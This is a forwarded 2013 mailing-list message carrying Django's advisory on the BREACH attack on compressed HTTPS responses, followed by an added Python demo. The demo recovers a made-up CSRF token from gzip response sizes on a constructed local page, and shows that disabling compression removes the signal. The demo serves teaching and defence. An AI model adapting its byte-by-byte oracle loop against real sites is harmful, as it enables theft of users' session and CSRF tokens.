----- Forwarded message from Josh Steiner -----
Date: Tue, 6 Aug 2013 11:06:10 -0700
From: Josh Steiner
To: Guardian Dev
Subject: [guardian-dev] BREACH: SSL is pwnd
in summary, you need to turn off gzip to mitigate this for now:
http://breachattack.com/
https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/
At last week's Black Hat conference, researchers announced the BREACH
attack (http://breachattack.com/), a new attack on web apps that can
recover data even when secured with SSL connections. The BREACH paper
(http://breachattack.com/resources/BREACH%20-%20SSL,%20gone%20in%2030%20secon...
, PDF) contains full details (and is a good and fairly easy read).
Given what we know so far, we believe that *BREACH may be used to
compromise Django's CSRF protection*. Thus, we're issuing this advisory so
that our users can defend themselves.
BREACH takes advantage of vulnerabilities when serving compressed data over
SSL/TLS. Thus, to protect yourself from BREACH, you should disable
compression of web responses. Depending on how your application is
deployed, this could take a couple forms:
1. Disabling Django's GZip middleware
   (https://docs.djangoproject.com/en/dev/ref/middleware/#module-django.middlewa...).
2. Disabling GZip compression in your web server's config. For example,
   if you're using Apache you'd want to disable mod_deflate
   (http://httpd.apache.org/docs/2.2/mod/mod_deflate.html); in nginx you'd
   disable the gzip module (http://wiki.nginx.org/HttpGzipModule).
Additionally, you should make sure you disable TLS compression by adjusting
your server's SSL ciphers
(http://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/).
We plan to take steps to address BREACH in Django itself, but in the
meantime we recommend that all users of Django understand this
vulnerability and take action if appropriate.
Posted by *Jacob Kaplan-Moss* on August 6, 2013
_______________________________________________
Guardian-dev mailing list
Post: Guardian-dev@lists.mayfirst.org
List info: https://lists.mayfirst.org/mailman/listinfo/guardian-dev
To Unsubscribe
Send email to: Guardian-dev-unsubscribe@lists.mayfirst.org
Or visit: https://lists.mayfirst.org/mailman/options/guardian-dev/eugen%40leitl.org
You are subscribed as: eugen@leitl.org
----- End forwarded message -----
--
Eugen* Leitl <a href="http://leitl.org">leitl</a> http://leitl.org
______________________________________________________________
ICBM: 48.07100, 11.36820 http://ativel.com http://postbiota.org
AC894EC5: 38A5 5F46 A4FF 59B8 336B 47EE F46E 3489 AC89 4EC5
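The compression oracle the forwarded advisory is about, as an added worked example; it is not part of the forwarded message, of the Django post, or of the BREACH authors' tooling. It builds a constructed page in the style of a Django search view that echoes the query (HTML-escaped, as template autoescaping would) and renders a logout link carrying a made-up csrfmiddlewaretoken in its query string (a pattern to avoid, used here because it puts the secret right after text the attacker can reproduce), gzips the page the way GZipMiddleware or mod_deflate would, and recovers the token one byte at a time purely from the compressed size. The same loop run with compression disabled, which is the mitigation the post recommends, gets no signal and stops at once. The page layout, the token value, the hex alphabet and the known prefix are all assumptions of the demo; zlib's Z_FIXED strategy is selected so that each literal costs exactly eight bits and the oracle is a clean one byte per correct guess (the dynamic Huffman tables a real server uses blur that by a few bits per guess and cost the attacker more requests, but do not remove the leak).

```python
import html
import zlib

# Everything below is constructed for the demo: the token, the page and the
# "search" reflection are hypothetical, not Django's real markup.
SECRET_TOKEN = "f3a9c1e7b2d4"
TOKEN_ALPHABET = "0123456789abcdef"    # assumed token charset
KNOWN_PREFIX = "csrfmiddlewaretoken="  # text the attacker knows precedes the secret
Z_FIXED = getattr(zlib, "Z_FIXED", 4)  # zlib strategy constant (4 in zlib.h)


def render_page(query: str, token: str = SECRET_TOKEN) -> bytes:
    """Constructed response: the query is echoed (HTML-escaped) before a link
    that carries the CSRF token in its URL, so guess and secret share a page."""
    return (
        "<html><body>"
        f"<p>Search results for: {html.escape(query)}</p>"
        f'<a href="/accounts/logout/?{KNOWN_PREFIX}{token}">Log out</a>'
        "</body></html>"
    ).encode()


def gzip_body(body: bytes) -> bytes:
    """gzip the body as GZipMiddleware or mod_deflate would (wbits=31 adds the
    gzip framing). Z_FIXED pins the Huffman tables so that each literal costs
    exactly 8 bits and a correct guess shortens the output by exactly one byte."""
    comp = zlib.compressobj(9, zlib.DEFLATED, 31, 8, Z_FIXED)
    return comp.compress(body) + comp.flush()


def response_size(query: str, compress: bool) -> int:
    """What a network observer sees: TLS hides the content, not the length."""
    body = render_page(query)
    return len(gzip_body(body)) if compress else len(body)


def breach_recover(compress: bool, max_len: int = len(SECRET_TOKEN)) -> str:
    """Recover the token byte by byte from response sizes alone.

    The guess is echoed into the page ahead of the real token. When it is right,
    DEFLATE's back-reference from the token to the echo grows by one byte and one
    literal disappears, so that response is the shortest of the batch. A wrong
    guess leaves the literal in place. With compression off every guess is the
    same size, there is no unique winner, and the loop stops immediately."""
    known = ""
    for _ in range(max_len):
        sizes = {c: response_size(KNOWN_PREFIX + known + c, compress)
                 for c in TOKEN_ALPHABET}
        smallest = min(sizes.values())
        winners = [c for c, size in sizes.items() if size == smallest]
        if len(winners) != 1:
            break                      # no unique signal: the oracle is gone
        known += winners[0]
    return known


if __name__ == "__main__":
    print("gzip on :", breach_recover(compress=True))
    print("gzip off:", repr(breach_recover(compress=False)))
```

The loop is the whole attack: sixteen requests per recovered byte, no cryptography broken, nothing but response lengths observed. Disabling compression on the response (item 1 or 2 in the advisory) removes the signal, which is exactly what the compress=False run shows; TLS-level compression (item 3) would reintroduce the same oracle one layer down, which is why the advisory asks for both.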